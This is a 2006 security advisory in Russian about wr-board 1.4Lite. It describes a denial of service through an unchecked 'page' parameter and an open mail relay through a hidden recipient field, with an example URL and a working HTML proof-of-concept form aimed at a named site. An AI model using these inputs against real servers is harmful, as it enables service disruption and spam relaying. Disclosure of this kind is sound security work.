уязвимости скриптов с www.wr-script.ru (wr-board 1.4Lite)

2006-11-23T00:00:00
ID SECURITYVULNS:DOC:15200
Type securityvulns
Reporter Securityvulns
Modified 2006-11-23T00:00:00

Description

1) DoS. Не проверяется значение параметра page в index.php http://wr-script.host/board/index.php?event=list&id=112420973596&page=-10000000000000000 2) Открытая почтовая форма. Адрес по которому будет отправлено сообщение с доски передается в поле uemail (hidden). Пример использования:

<html><head><title>Отправление сообщения автору объявления</title></head><body> <center><TABLE bgColor=#aaaaaa cellPadding=2 cellSpacing=1> <FORM action='http://www.voshod.dp.ua/tools.php?event=mailtogo' method=post> <TBODY><TR><TD align=middle bgColor=#cccccc colSpan=2>Отправка сообщения <B></B></TD></TR>

<TR bgColor=#ffffff><TD>Ваше имя:<FONT color=#ff0000>*</FONT><BR></TD> <TD><INPUT name=name style='FONT-SIZE: 14px; WIDTH: 250px'></TD></TR>

<TR bgColor=#ffffff><TD>Ваш E-mail:<FONT color=#ff0000>*</FONT></TD> <TD><INPUT name=email style='FONT-SIZE: 14px; WIDTH: 250px'></TD></TR>

<TR bgColor=#ffffff><TD>Сообщение:<FONT color=#ff0000>*</FONT></TD> <TD><TEXTAREA name=msg style='FONT-SIZE: 14px; HEIGHT: 250px; WIDTH: 250px'></TEXTAREA></TD></TR> <INPUT type=hidden name=uemail value=test@yahoo.com><INPUT type=hidden name=uname value="nikto"><INPUT type=hidden name=id value=0><INPUT type=hidden name=fid value=0><input type=hidden name=add value="index.php"><TR><TD bgColor=#FFFFFF colspan=2><center><INPUT type=submit value=Отправить></TD></TR></TBODY></TABLE> </FORM>